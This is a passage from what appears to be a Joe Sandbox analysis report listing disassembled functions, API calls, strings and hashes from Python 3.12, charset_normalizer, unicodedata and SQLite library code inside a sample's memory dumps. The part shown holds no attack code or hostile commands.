_RTC_Initialize.LIBCMT ref: 00007FFBAB5F10D8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FFBAB5F10FE
__scrt_release_startup_lock.LIBCMT ref: 00007FFBAB5F1129

Memory Dump Source

Source File: 00000002.00000002.1835891032.00007FFBAB5F1000.00000020.00000001.01000000.0000002B.sdmp, Offset: 00007FFBAB5F0000, based on PE: true

Associated: 00000002.00000002.1835837141.00007FFBAB5F0000.00000002.00000001.01000000.0000002B.sdmpDownload File
Associated: 00000002.00000002.1835936380.00007FFBAB5F6000.00000002.00000001.01000000.0000002B.sdmpDownload File
Associated: 00000002.00000002.1835980235.00007FFBAB5FB000.00000002.00000001.01000000.0000002B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab5f0000_HyZh4pn0RF.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 349153199-0
Opcode ID: 474c6b7a685372b53d5ee10a3ee998af2d98c0b67a4930f1a88a30a85650b8b9
Instruction ID: be7ccd7ad1c512499314c4eb15268035d63ed69f7f77651693b03768edc16c47
Opcode Fuzzy Hash: 474c6b7a685372b53d5ee10a3ee998af2d98c0b67a4930f1a88a30a85650b8b9
Instruction Fuzzy Hash: B2819EE0E0E24346FA529BB6D461679E2A4AF95780F44C035DD2D877B7DE3CE40DAB00

Function 00007FFBAB6ADBF0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 154COMMON

Download Yara Rule

APIs

PyErr_Occurred.PYTHON312(?,?,?,?,?,00007FFBAB6A79AE), ref: 00007FFBAB6ADC83
PyLong_FromSsize_t.PYTHON312(?,?,?,?,?,00007FFBAB6A79AE), ref: 00007FFBAB6ADCD2
PyLong_FromSsize_t.PYTHON312(?,?,?,?,?,00007FFBAB6A79AE), ref: 00007FFBAB6ADCFE
PyObject_RichCompareBool.PYTHON312(?,?,?,?,?,00007FFBAB6A79AE), ref: 00007FFBAB6ADD15
_Py_Dealloc.PYTHON312(?,?,?,?,?,00007FFBAB6A79AE), ref: 00007FFBAB6ADD2B
_Py_Dealloc.PYTHON312(?,?,?,?,?,00007FFBAB6A79AE), ref: 00007FFBAB6ADD3F

Strings

charset_normalizer.md.CjkInvalidStopPlugin, xrefs: 00007FFBAB6ADDE8
__init__, xrefs: 00007FFBAB6ADD89, 00007FFBAB6ADDFB
ratio, xrefs: 00007FFBAB6ADC99

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: DeallocFromLong_Ssize_t$BoolCompareErr_Object_OccurredRich
String ID: __init__$charset_normalizer.md.CjkInvalidStopPlugin$ratio
API String ID: 871640449-4126926341
Opcode ID: 50dfb51dc545f733170bcd5f131fd8dec372b9381f754ea30373e4415d5ce4ea
Instruction ID: 6d8394cacc0de11158b537921d5f0147c4cd1b6c9c90d5e03c62c98bf6a0da2b
Opcode Fuzzy Hash: 50dfb51dc545f733170bcd5f131fd8dec372b9381f754ea30373e4415d5ce4ea
Instruction Fuzzy Hash: A35170B1E4B60641EE56AB7DEC102B9E3B0AF45B90F48A539DE3E077B5DE2CE4518340

Function 00007FFBAB6A4820 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

PyLong_FromSsize_t.PYTHON312 ref: 00007FFBAB6A4852
PyLong_FromSsize_t.PYTHON312 ref: 00007FFBAB6A487E
PySlice_New.PYTHON312 ref: 00007FFBAB6A48A8
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A48BF
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A48D3
PyObject_GetItem.PYTHON312 ref: 00007FFBAB6A48E4
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A48FB
PyErr_SetString.PYTHON312 ref: 00007FFBAB6A494E

Strings

interpreted classes cannot inherit from compiled, xrefs: 00007FFBAB6A4944

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Dealloc$FromLong_Ssize_t$Err_ItemObject_Slice_String
String ID: interpreted classes cannot inherit from compiled
API String ID: 575668516-2110327174
Opcode ID: 4e2baef39ba8fe060f07d6d6f0bced05c2d01185e87a098f7d4dafbc9954950d
Instruction ID: f73725a756d943c0b3aa3e679667d77d476c5f94368ba790dda8b7979c42bcd2
Opcode Fuzzy Hash: 4e2baef39ba8fe060f07d6d6f0bced05c2d01185e87a098f7d4dafbc9954950d
Instruction Fuzzy Hash: 844144B1A4BA4281EE564F79ED94278E3B0AF44B90F48A134CE3D467F4DF2DE4518700

Function 00007FFBAB6AA110 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFBAB6A2920: PyLong_FromSsize_t.PYTHON312 ref: 00007FFBAB6A2961
Part of subcall function 00007FFBAB6A2920: PyNumber_Add.PYTHON312 ref: 00007FFBAB6A29B7
Part of subcall function 00007FFBAB6A2920: _Py_Dealloc.PYTHON312 ref: 00007FFBAB6A29D7
Part of subcall function 00007FFBAB6A2920: _Py_Dealloc.PYTHON312 ref: 00007FFBAB6A29EB

PyDict_GetItemWithError.PYTHON312 ref: 00007FFBAB6AA16B
PyErr_Occurred.PYTHON312 ref: 00007FFBAB6AA179
PyErr_SetObject.PYTHON312 ref: 00007FFBAB6AA191
PyObject_Vectorcall.PYTHON312 ref: 00007FFBAB6AA1C6
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6AA1DD
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6AA220

Strings

bool, xrefs: 00007FFBAB6AA1F8
feed, xrefs: 00007FFBAB6AA232

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Dealloc$Err_$Dict_ErrorFromItemLong_Number_ObjectObject_OccurredSsize_tVectorcallWith
String ID: bool$feed
API String ID: 2189706420-2849697477
Opcode ID: 958a22a6337853555e897f1e5a14fcd0471710981ec55253fe3441e9c772aafb
Instruction ID: 343ffb77bdf685348c177e0ba59bdd65810f45b477d51c7637dccd4cce37726c
Opcode Fuzzy Hash: 958a22a6337853555e897f1e5a14fcd0471710981ec55253fe3441e9c772aafb
Instruction Fuzzy Hash: 0B4142B1A4BA4681EE669B79ED60275F3B1FF44B80F08A036DE6D07775DE2DE4548300

Function 00007FFBAB6AF2F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFBAB6A2920: PyLong_FromSsize_t.PYTHON312 ref: 00007FFBAB6A2961
Part of subcall function 00007FFBAB6A2920: PyNumber_Add.PYTHON312 ref: 00007FFBAB6A29B7
Part of subcall function 00007FFBAB6A2920: _Py_Dealloc.PYTHON312 ref: 00007FFBAB6A29D7
Part of subcall function 00007FFBAB6A2920: _Py_Dealloc.PYTHON312 ref: 00007FFBAB6A29EB

PyDict_GetItemWithError.PYTHON312 ref: 00007FFBAB6AF34B
PyErr_Occurred.PYTHON312 ref: 00007FFBAB6AF359
PyErr_SetObject.PYTHON312 ref: 00007FFBAB6AF371
PyObject_Vectorcall.PYTHON312 ref: 00007FFBAB6AF3A6
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6AF3BD
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6AF400

Strings

bool, xrefs: 00007FFBAB6AF3D8
feed, xrefs: 00007FFBAB6AF412

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Dealloc$Err_$Dict_ErrorFromItemLong_Number_ObjectObject_OccurredSsize_tVectorcallWith
String ID: bool$feed
API String ID: 2189706420-2849697477
Opcode ID: 8e0caade2916fc91190bf6248451af5af673b86bd580171c2b13f121ea62ae45
Instruction ID: 06f8c7cbc118da252b5ec39db07f5bd4cfb123a1d89ada9c6de4b292847b5edf
Opcode Fuzzy Hash: 8e0caade2916fc91190bf6248451af5af673b86bd580171c2b13f121ea62ae45
Instruction Fuzzy Hash: C74133B1A4BA0281EB529B79ED502B9E3B1FF48B80F44A035DE6E87775DF2CE4418741

Function 00007FFBAB6AA720 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 100COMMON

Download Yara Rule

APIs

PyDict_GetItemWithError.PYTHON312 ref: 00007FFBAB6AA758
PyErr_Occurred.PYTHON312 ref: 00007FFBAB6AA766
PyErr_SetObject.PYTHON312 ref: 00007FFBAB6AA77E
PyObject_GetItem.PYTHON312 ref: 00007FFBAB6AA791
PyObject_Vectorcall.PYTHON312 ref: 00007FFBAB6AA7B3
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6AA7CA
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6AA80F

Strings

bool, xrefs: 00007FFBAB6AA7E5
feed, xrefs: 00007FFBAB6AA822

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: DeallocErr_ItemObject_$Dict_ErrorObjectOccurredVectorcallWith
String ID: bool$feed
API String ID: 2902451266-2849697477
Opcode ID: f4f92837b73cd07083ecf196f641edd5c5d76e013ce287cc97f39c4dfbe217e1
Instruction ID: e67c08413edb88e7302821ef6edb5aa66f25fb99909f222626510b2335a3bd35
Opcode Fuzzy Hash: f4f92837b73cd07083ecf196f641edd5c5d76e013ce287cc97f39c4dfbe217e1
Instruction Fuzzy Hash: 794132B5A4BA4281EA679B79ED5427AE3B0FF44B80F44E03ACE6D07775DE2CE4418710

Function 00007FFBAB6AF0E0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81COMMON

Download Yara Rule

APIs

PyDict_GetItemWithError.PYTHON312 ref: 00007FFBAB6AF110
PyErr_Occurred.PYTHON312 ref: 00007FFBAB6AF11E
PyErr_SetObject.PYTHON312 ref: 00007FFBAB6AF136
PyObject_GetItem.PYTHON312 ref: 00007FFBAB6AF149
PyObject_Vectorcall.PYTHON312 ref: 00007FFBAB6AF16B
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6AF182
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6AF1C7

Strings

bool, xrefs: 00007FFBAB6AF19D
eligible, xrefs: 00007FFBAB6AF1DA

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: DeallocErr_ItemObject_$Dict_ErrorObjectOccurredVectorcallWith
String ID: bool$eligible
API String ID: 2902451266-3320767611
Opcode ID: eacaf991cd320d3b28d9c0a86148e8b297e2767c2de5e507dac64fabba49b49f
Instruction ID: 8bfbf1dfaa483107004404aa81d63592ba64c89afe136956dc1eb28df84c2e68
Opcode Fuzzy Hash: eacaf991cd320d3b28d9c0a86148e8b297e2767c2de5e507dac64fabba49b49f
Instruction Fuzzy Hash: 44313DB2A4BA4281EA568B79ED50279E7B1BF48B84F48E435DE2D47774DE2CE8418301

Function 00007FFBAA4645B8 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 59COMMON

Download Yara Rule

APIs

_PyArg_CheckPositional.PYTHON312 ref: 00007FFBAA4645EB
_PyArg_BadArgument.PYTHON312 ref: 00007FFBAA464620
_PyUnicode_ToDigit.PYTHON312 ref: 00007FFBAA464642
PyErr_SetString.PYTHON312 ref: 00007FFBAA464662
PyLong_FromLong.PYTHON312 ref: 00007FFBAA46467C

Strings

not a digit, xrefs: 00007FFBAA464658
argument 1, xrefs: 00007FFBAA464619
a unicode character, xrefs: 00007FFBAA46460B
digit, xrefs: 00007FFBAA4645E4, 00007FFBAA464612

Memory Dump Source

Source File: 00000002.00000002.1831536690.00007FFBAA461000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFBAA460000, based on PE: true

Associated: 00000002.00000002.1831396691.00007FFBAA460000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA465000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA4C2000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA50E000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA512000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA517000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA56F000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832420063.00007FFBAA572000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832455166.00007FFBAA574000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa460000_HyZh4pn0RF.jbxd

Similarity

API ID: Arg_$ArgumentCheckDigitErr_FromLongLong_PositionalStringUnicode_
String ID: a unicode character$argument 1$digit$not a digit
API String ID: 4245020737-4278345224
Opcode ID: aed245a8664a28b413df88f13d2b45979c93eee2f6ab32f7962ea5d8cc8ee058
Instruction ID: 6aa95d9c2483a1ba6e8f429484bd2fe09e9c2b878a2d9249b276bf9bae38d83e
Opcode Fuzzy Hash: aed245a8664a28b413df88f13d2b45979c93eee2f6ab32f7962ea5d8cc8ee058
Instruction Fuzzy Hash: D9216BB1F0A642D5EF528F35E5401B923A8EF44F88F4484B5EE0E87664EE3CE4468721

Function 00007FFBAA592430 Relevance: 15.5, APIs: 4, Strings: 6, Instructions: 477COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140 ref: 00007FFBAA5924DB
memcpy.VCRUNTIME140 ref: 00007FFBAA59279A
memcpy.VCRUNTIME140 ref: 00007FFBAA5929FA
memset.VCRUNTIME140 ref: 00007FFBAA592A03

Strings

PRAGMA "%w".page_count, xrefs: 00007FFBAA59250A
misuse, xrefs: 00007FFBAA5925C1, 00007FFBAA592A9A
2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0, xrefs: 00007FFBAA59256E, 00007FFBAA592A8D
API called with NULL prepared statement, xrefs: 00007FFBAA59257D
%s at line %d of [%.10s], xrefs: 00007FFBAA5925CD, 00007FFBAA592AA6
API called with finalized prepared statement, xrefs: 00007FFBAA592599, 00007FFBAA592A7E

Memory Dump Source

Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true

Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd

Similarity

API ID: memcpy$memset
String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$API called with NULL prepared statement$API called with finalized prepared statement$PRAGMA "%w".page_count$misuse
API String ID: 438689982-3885987512
Opcode ID: 609fc2fb13e00cb4e20dc77efeb23423f801ae0726e0f45f7222155acbe24490
Instruction ID: 2b9ae6a3ccd21b966272d3dcc6b56de6e833284c6ce8468906ab0a022b73e6f0
Opcode Fuzzy Hash: 609fc2fb13e00cb4e20dc77efeb23423f801ae0726e0f45f7222155acbe24490
Instruction Fuzzy Hash: 0E129DA2A0BA42C1EA669B36D59037D73A9BF56F84F0841B1CE0D0B795DF3CE4478364

Function 00007FFBAA5B9F70 Relevance: 15.3, APIs: 2, Strings: 8, Instructions: 330COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FFBAA5BA073
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FFBAA5BA154

Strings

zeroblob(%d), xrefs: 00007FFBAA5BA310
%02x, xrefs: 00007FFBAA5BA374
?, xrefs: 00007FFBAA5BA168
'%.*q', xrefs: 00007FFBAA5BA2C5
%!.15g, xrefs: 00007FFBAA5BA22E
NULL, xrefs: 00007FFBAA5BA1DD
%lld, xrefs: 00007FFBAA5BA211
-- , xrefs: 00007FFBAA5BA003, 00007FFBAA5BA022

Memory Dump Source

Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true

Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd

Similarity

API ID: memcpy
String ID: %!.15g$%02x$%lld$'%.*q'$-- $?$NULL$zeroblob(%d)
API String ID: 3510742995-875588658
Opcode ID: d5dff3e84e1e23a8fc53c32058c43ab8a5c4bbbe5e67989a0810bec810ea8e84
Instruction ID: 1b4222a331532925202f4a1be2d3bf3face7500d787bf4013d237241a90404fa
Opcode Fuzzy Hash: d5dff3e84e1e23a8fc53c32058c43ab8a5c4bbbe5e67989a0810bec810ea8e84
Instruction Fuzzy Hash: FAE182A2F0A656CAFB22CB74D4403BC37A4AB06749F044176DE0E62AD5EF3CE446C764

Function 00007FFBAA5D5FB0 Relevance: 15.3, APIs: 1, Strings: 9, Instructions: 325COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140 ref: 00007FFBAA5D6318

Strings

SELECT raise(ABORT,%Q) FROM "%w"."%w", xrefs: 00007FFBAA5D613D, 00007FFBAA5D61B9, 00007FFBAA5D62C3
Cannot add a PRIMARY KEY column, xrefs: 00007FFBAA5D60C8
UPDATE "%w".sqlite_master SET sql = printf('%%.%ds, ',sql) || %Q || substr(sql,1+length(printf('%%.%ds',sql))) WHERE type = 'table' AND name = %Q, xrefs: 00007FFBAA5D635C
Cannot add a column with non-constant default, xrefs: 00007FFBAA5D61AF
SELECT CASE WHEN quick_check GLOB 'CHECK*' THEN raise(ABORT,'CHECK constraint failed') ELSE raise(ABORT,'NOT NULL constraint failed') END FROM pragma_quick_check(%Q,%Q) WHERE quick_check GLOB 'CHECK*' OR quick_check GLOB 'NULL*', xrefs: 00007FFBAA5D6491
Cannot add a REFERENCES column with non-NULL default value, xrefs: 00007FFBAA5D6133
cannot add a STORED column, xrefs: 00007FFBAA5D62B4
Cannot add a NOT NULL column with default value NULL, xrefs: 00007FFBAA5D6155
Cannot add a UNIQUE column, xrefs: 00007FFBAA5D60E3

Memory Dump Source

Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true

Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd

Similarity

API ID: memcpy
String ID: Cannot add a NOT NULL column with default value NULL$Cannot add a PRIMARY KEY column$Cannot add a REFERENCES column with non-NULL default value$Cannot add a UNIQUE column$Cannot add a column with non-constant default$SELECT CASE WHEN quick_check GLOB 'CHECK*' THEN raise(ABORT,'CHECK constraint failed') ELSE raise(ABORT,'NOT NULL constraint failed') END FROM pragma_quick_check(%Q,%Q) WHERE quick_check GLOB 'CHECK*' OR quick_check GLOB 'NULL*'$SELECT raise(ABORT,%Q) FROM "%w"."%w"$UPDATE "%w".sqlite_master SET sql = printf('%%.%ds, ',sql) || %Q || substr(sql,1+length(printf('%%.%ds',sql))) WHERE type = 'table' AND name = %Q$cannot add a STORED column
API String ID: 3510742995-3865411212
Opcode ID: fef009155f3ec238212e6e53dd1564833794cd72d0552d74e22e0b1999fb271b
Instruction ID: fd0f2beff9a4a65127448a9725a72ea1258c4ee57a3dc89b44e88b422a751002
Opcode Fuzzy Hash: fef009155f3ec238212e6e53dd1564833794cd72d0552d74e22e0b1999fb271b
Instruction Fuzzy Hash: 7BE18AA1A1AA82C1EE62CB25E5443B9B3A9FF46BC4F0401B5DE4D07B95DF3CE4478724

Function 00007FFBAB6A80F0 Relevance: 15.1, APIs: 10, Instructions: 82threadCOMMON

Download Yara Rule

APIs

PyObject_GC_UnTrack.PYTHON312 ref: 00007FFBAB6A80FD
_PyTrash_cond.PYTHON312 ref: 00007FFBAB6A810F
_PyThreadState_UncheckedGet.PYTHON312 ref: 00007FFBAB6A8119
_PyTrash_begin.PYTHON312 ref: 00007FFBAB6A8128
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A8159
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A8182
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A81AB
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A81D4
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A81F6
_PyTrash_end.PYTHON312 ref: 00007FFBAB6A8211

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Dealloc$Object_State_ThreadTrackTrash_beginTrash_condTrash_endUnchecked
String ID:
API String ID: 2819143443-0
Opcode ID: 23d97488961b93e407653e4d04d1075f3d4a6115df0bee2f52c695c0df5d3962
Instruction ID: 0b528eaf2fe17e41b493a18291a8f41215f8a9cc1cdb2dd531d9faf0b76fc4de
Opcode Fuzzy Hash: 23d97488961b93e407653e4d04d1075f3d4a6115df0bee2f52c695c0df5d3962
Instruction Fuzzy Hash: B741DFB290A60281EB5A4F79DC58378BAB4EF45B79F18A238CD79412F5CF7DD8858340

Function 00007FFBAB6AA440 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 149COMMON

Download Yara Rule

APIs

PyErr_Occurred.PYTHON312(?,?,?,?,?,00007FFBAB6A59BE), ref: 00007FFBAB6AA4DE
PyLong_FromSsize_t.PYTHON312(?,?,?,?,?,00007FFBAB6A59BE), ref: 00007FFBAB6AA53B
PyObject_RichCompareBool.PYTHON312(?,?,?,?,?,00007FFBAB6A59BE), ref: 00007FFBAB6AA552
_Py_Dealloc.PYTHON312(?,?,?,?,?,00007FFBAB6A59BE), ref: 00007FFBAB6AA568
_Py_Dealloc.PYTHON312(?,?,?,?,?,00007FFBAB6A59BE), ref: 00007FFBAB6AA57C

Strings

charset_normalizer.md.UnprintablePlugin, xrefs: 00007FFBAB6AA628
__init__, xrefs: 00007FFBAB6AA5C9, 00007FFBAB6AA63B
ratio, xrefs: 00007FFBAB6AA4F4

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Dealloc$BoolCompareErr_FromLong_Object_OccurredRichSsize_t
String ID: __init__$charset_normalizer.md.UnprintablePlugin$ratio
API String ID: 2538524772-1538754472
Opcode ID: bd24d104d4e5ddc98eea7bfccf0ae522fc41dc3e0d7e104114ce5afde9d774f5
Instruction ID: 37ac025232fe5b7f7be0f02e7355be9b0ec7c8d59d57e0972e9bbafd29155fce
Opcode Fuzzy Hash: bd24d104d4e5ddc98eea7bfccf0ae522fc41dc3e0d7e104114ce5afde9d774f5
Instruction Fuzzy Hash: 345170B2E4AA4281EA579B79DC142B9E3B1AF45B90F08A13ADD6D077B1DF3CE4418740

Function 00007FFBAA590CD0 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 135COMMON

Download Yara Rule

APIs

new[].MSPDB140-MSVCRT ref: 00007FFBAA590DE7

Strings

:, xrefs: 00007FFBAA590D01
\, xrefs: 00007FFBAA590D58
winFullPathname1, xrefs: 00007FFBAA590DCC
%s%c%s, xrefs: 00007FFBAA590D46
?, xrefs: 00007FFBAA590D11
:, xrefs: 00007FFBAA590D3C
